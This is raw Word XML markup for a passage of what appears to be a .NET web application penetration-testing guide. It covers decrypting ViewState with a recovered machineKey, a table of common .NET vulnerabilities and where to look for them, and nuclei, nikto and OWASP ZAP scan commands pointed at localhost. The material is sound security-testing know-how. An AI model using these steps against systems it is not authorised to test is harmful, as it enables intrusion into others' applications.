    <w:p w14:paraId="28315DDD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EABECE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># If machineKey found in web.config - decrypt ViewState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A69E4F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>python3 aspnet_decrypt.py -m &lt;machineKey&gt; -c &lt;encrypted_value&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0313FC64">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3: Web Application Attacks (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C64AF1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Focus on vulnerabilities common to .NET applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4235C563">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Common .NET-Specific Vulns:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2440"/>
        <w:gridCol w:w="5956"/>
      </w:tblGrid>
      <w:tr w14:paraId="5E55F0D9">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23E23C89">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="393917E1">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Where to Look</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78A8560C">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22059411">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B0E24D8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Raw SQL strings, Dapper with string interpolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72F22B93">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CF9F38E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C018FB0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>@Html.Raw() without encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F294FFC">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F7EA209">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="481B0205">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Missing anti-forgery tokens in MVC forms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D33C3F2">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EEE4C09">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16E7FF24">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Integer IDs in URLs without authorization checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4223EC15">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25F0F9C6">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Insecure Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28AAF91F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>JavaScriptSerializer with TypeNameHandling.All</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="401DCA90">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2395" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7724C8F4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5911" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="593E24FC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Older .NET Framework XML parsers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51F0C92F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Automated Scanning Tools:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1741"/>
        <w:gridCol w:w="6110"/>
      </w:tblGrid>
      <w:tr w14:paraId="43EBA181">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D62E5DF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76194EA9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Command / Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4576A795">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="419FB24C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2687DEAF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Active scan + Import OpenAPI definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2BC51A7D">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7407C7F5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Burp Suite Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="698EF11F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Scanner with .NET-specific extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D24EF0A">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4395FA49">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BAFAA4B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>nuclei -u http://localhost:8080 -t ~/nuclei-templates/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5CF87470">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CF32CC6">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38096F1D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>nikto -h http://localhost:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4297E2C6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>ZAP Active Scan Setup (With Auth):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E3A9F5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC08A6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># 1. Import OpenAPI definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E4B0AF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># In ZAP: Import &gt; OpenAPI from URL &gt; http://localhost:8080/swagger/v1/swagger.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5ADE07">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F046BB6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># 2. Load HTTP Sender script for JWT authentication[citation:2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A515A8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Script adds Authorization: Bearer &lt;token&gt; to every request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CC77E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBDF12F">
      <w:pPr>
